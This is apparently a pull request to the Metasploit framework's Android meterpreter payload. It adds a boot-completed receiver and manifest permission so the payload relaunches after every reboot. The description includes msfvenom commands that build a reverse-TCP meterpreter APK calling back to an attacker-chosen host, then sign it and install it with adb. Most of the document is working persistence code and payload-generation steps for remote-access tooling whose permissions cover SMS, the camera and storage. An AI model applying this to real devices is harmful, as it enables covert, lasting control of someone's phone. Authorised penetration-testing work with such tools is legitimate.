### PR TITLE
Android: add BOOT_COMPLETED receiver that starts the Payload

### DIFF
--- a/java/androidpayload/app/src/com/metasploit/stage/MainBroadcastReceiver.java
+++ b/java/androidpayload/app/src/com/metasploit/stage/MainBroadcastReceiver.java
@@ -1,0 +1,15 @@
+package com.metasploit.stage;
+
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+
+public class MainBroadcastReceiver extends BroadcastReceiver {
+
+    @Override
+    public void onReceive(Context context, Intent intent) {
+        if (Intent.ACTION_BOOT_COMPLETED.equals(intent.getAction())) {
+            Payload.start(context);
+        }
+    }
+}

--- a/java/androidpayload/app/src/main/AndroidManifest.xml
+++ b/java/androidpayload/app/src/main/AndroidManifest.xml
@@ -24,6 +24,7 @@
     <uses-permission android:name="android.permission.CAMERA" />
     <uses-permission android:name="android.permission.READ_SMS" />
     <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
 
     <application
         android:label="@string/app_name" >
@@ -42,6 +43,13 @@
                 <action android:name="android.intent.action.VIEW" />
             </intent-filter>
         </activity>
+        <receiver
+            android:name=".MainBroadcastReceiver"
+            android:label="MainBroadcastReceiver">
+            <intent-filter>
+                <action android:name="android.intent.action.BOOT_COMPLETED" />
+            </intent-filter>
+        </receiver>
     </application>
 
 </manifest>


### PR DESCRIPTION
@jduck mention in IRC that BOOT_COMPLETED might be a good place to start the Android meterpreter. This change adds a BroadcastReceiver that listens for the BOOT_COMPLETED intent and starts the payload.
To test:
 * Install the Android meterpreter on a phone, e.g:
```
./msfvenom -p android/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -o met.apk
jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA met.apk androiddebugkey
adb install met.apk
```
 * Start the app
 - [ ] Ensure you get a session
 * Restart the device
 - [ ] Ensure you get a session (once the phone has finished booting) and that it works

You'll need to start the app initially to ensure the app isn't in "stopped state", see: 
https://code.google.com/p/android/issues/detail?id=18225
http://developer.android.com/about/versions/android-3.1.html#launchcontrols